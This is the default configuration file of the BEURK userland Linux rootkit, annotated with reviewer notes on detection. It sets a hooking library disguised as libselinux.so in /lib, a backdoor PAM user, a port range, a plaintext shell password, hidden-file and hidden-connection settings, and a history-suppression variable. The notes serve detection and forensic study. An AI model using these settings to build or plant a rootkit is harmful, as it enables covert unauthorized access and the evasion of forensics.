beurk.conf
# BEURK is a userland rootkit for GNU/Linux, focused around stealth.
# -> Default Configuration File
#
# vi: ft=conf
#
# Format: one `KEY = value` pair per line, `#` full-line comments only.
# Each key is preceded by a `type: description` comment.
# NOTE(review): every value below is a shipped default that can be changed
# before the library is generated, so for detection purposes a match is a
# weak indicator and a non-match proves nothing.
#
# str: file name of the generated hooking library
# NOTE(review): the default is also the file name used by the legitimate
# SELinux runtime library, so the name alone is not an indicator; verify the
# file against the distribution package (ownership and checksum) instead.
LIBRARY_NAME = libselinux.so
# str: directory where the infected library is stored; only works in
# `production` mode
INFECT_DIR = /lib
# hexbyte: the XOR key to use for obfuscated strings
# NOTE(review): a one-byte XOR is obfuscation, not encryption; strings in a
# recovered sample can be restored by trying all 256 key values.
XOR_KEY = 0xfe
# int: set DEBUG_LEVEL to 1 or 2 (0 to disable)
DEBUG_LEVEL = 0
# str: set debug file destination
DEBUG_FILE = /dev/stderr
# str: files whose name contains this string are hidden
# NOTE(review): as a userland hook this presumably only affects processes
# that load the library - confirm; comparing a directory listing from a
# trusted static binary or an offline mount is the usual cross-check.
MAGIC_STRING = _BEURK_
# str: PAM username (for su / ssh login)
# NOTE(review): authentication attempts under a user name that has no entry
# in the account database are worth alerting on - TODO confirm how the PAM
# hook behaves.
PAM_USER = beurkroot
# int: lower bound of the backdoor port range
# NOTE(review): the original wording ("port to connect to from backdoor")
# does not say whether this is a source or a destination port; confirm in
# the hook code before writing a network detection rule.
LOW_BACKDOOR_PORT = 64830
# int: upper bound of the backdoor port range (same caveat as above)
HIGH_BACKDOOR_PORT = 64840
# str: password required to connect
# NOTE(review): stored here in plain text and published as a default.
SHELL_PASSWORD = b3urkR0cks
# str: welcome message on backdoor connection
SHELL_MOTD = Welcome to BEURK's hidden shell ...
# str: remote shell to use for backdoor connection
SHELL_TYPE = /bin/bash
# str: name of the environment variable used to identify the rootkit's shell
# NOTE(review): presumably looked up through PROC_PATH + ENV_LINE
# (i.e. <PROC_PATH><pid>/environ) - confirm. A process environment carrying
# this variable, read with a trusted tool, is a candidate indicator.
HIDDEN_ENV_VAR = BEURK_ATTACKER
# str: predefined env `key=val` strings set when the shell is dropped
# _ENV_IS_ATTACKER sets the variable named by HIDDEN_ENV_VAR.
_ENV_IS_ATTACKER = BEURK_ATTACKER=true
# Points the shell history file at /dev/null, so shell history is not a
# reliable forensic source for such a session.
_ENV_NO_HISTFILE = HISTFILE=/dev/null
_ENV_XTERM = TERM=xterm
# str: utmp file
# NOTE(review): presumably referenced so login records can be filtered -
# confirm against the code that uses it.
_UTMP_FILE = /var/run/utmp
# str: wtmp file (same caveat as _UTMP_FILE)
_WTMP_FILE = /var/log/wtmp
# str: file whose content is altered to hide tcp/ipv4 connections
# NOTE(review): tools that read this file would then show an incomplete
# view; an off-host capture is the independent source to compare against.
PROC_NET_TCP = /proc/net/tcp
# str: file whose content is altered to hide tcp/ipv6 connections
PROC_NET_TCP6 = /proc/net/tcp6
# str: path to processes
PROC_PATH = /proc/
# str: scanf fmt string, DO NOT TOUCH
# NOTE(review): the %64[...] and %512s field widths bound how much each
# conversion may write; they presumably match buffer sizes in the C code,
# which is likely why this value must stay as is - confirm.
SCANF_PROC_NET_TCP = %d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %512s\n
# str: format string for proc/env (the %s is followed by "/environ")
ENV_LINE = %s/environ
# int: maximal length of our strings
MAX_LEN = 4125